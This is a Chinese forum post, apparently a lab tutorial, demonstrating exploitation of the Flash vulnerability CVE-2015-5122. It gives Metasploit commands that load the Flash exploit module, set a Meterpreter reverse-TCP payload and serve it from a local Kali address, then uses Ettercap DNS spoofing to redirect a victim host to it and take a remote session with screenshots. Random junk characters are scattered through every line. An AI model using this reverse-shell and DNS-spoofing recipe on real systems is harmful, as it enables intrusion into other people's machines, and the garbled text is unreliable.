cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

, D% m& w, B3 L# T* j$ v 二、cve2015-5122漏洞实例演示虚拟机 ( J: R. v! p3 {! F7 R& ]* G2 |6 B3 D

* f1 h1 n# O' m* t1 V( V 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： ^1 \) T( N. r! o# T. q

5 y1 o7 l5 b+ s# f; i2 x search cve-2015-5122如图： - p8 D" A" ?0 d2 {, G9 L6 ~) k

, H! s3 [- r$ |) v2 g , b2 y& P; i( y" I/ I! b6 _# z( ?

7 m% D3 O. [2 n/ n% Y1 @4 I: D# J 下面我们敲如下命令： 4 s/ v& I# U) D# N5 u& l$ o

& |# Y1 G( l i use exploit/multi/browser/adobe_flash_opaque_background_uaf * ~: |8 f: G: o7 u1 R/ ~* K

' C+ K2 A* G8 g# k2 c, w$ t set PAYLOAD windows/meterpreter/reverse_tcp 6 h, t, [5 U3 Z$ D

* F9 z( G9 ~/ A& ^ set LHOST 192.168.0.109 8 o0 G8 N$ f/ X

# p4 {2 m& U! y/ D set URIPATH / /*根目录*/ ?' \& s9 D8 j, V$ `) |' q

: @ f$ F$ P/ V# f set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 / C0 Y! x; S/ ?7 b# T* ^+ R

+ ?( H- _/ G) P set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 0 m: S; P/ f/ Y0 d

- [$ l; l7 L6 D$ F 然后show options如图： 9 e* b5 g# {' B2 ^

# G; D( c' W0 ^ E3 V , Z7 m6 s6 o" R2 Z3 ^! G! K! l

: U+ ]8 D4 l& h5 C" @+ ?" D 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
5 _( Z' k* H% U1 m% B+ c. P % L4 z5 ]% Q3 J! T' v7 f

9 r: n2 W, a, u7 N 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 1 ~3 W! z% ^7 o, @1 r$ }

# }& I0 B- q+ K Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf # \! P- k9 A# E. }% r

7 e& }# [% P# ^2 K) a7 y/ T, x- r ) _3 w9 E5 X" z! d9 R! Q2 Z

7 m$ R4 u; L; H, t" E) c; [7 |2 n 成功了，这时候我们断开ettercap，如图： 9 _1 }% ]" ?$ t* l

' C9 X3 K/ j# A, R; v7 Q4 s 7 k9 u* m1 k* D3 W

: ]: d( N" @# w9 l" _ Screenshot如图： 1 z* m6 k0 m! ~' V" R

& j# c7 c6 q5 b$ ^ c! Y3 V/ x3 l6 X2 Z, P

4 O) D- k6 f8 ]! C1 V. k & D0 ~. l5 ]1 p5 y& \

		自动登录	找回密码
密码			立即注册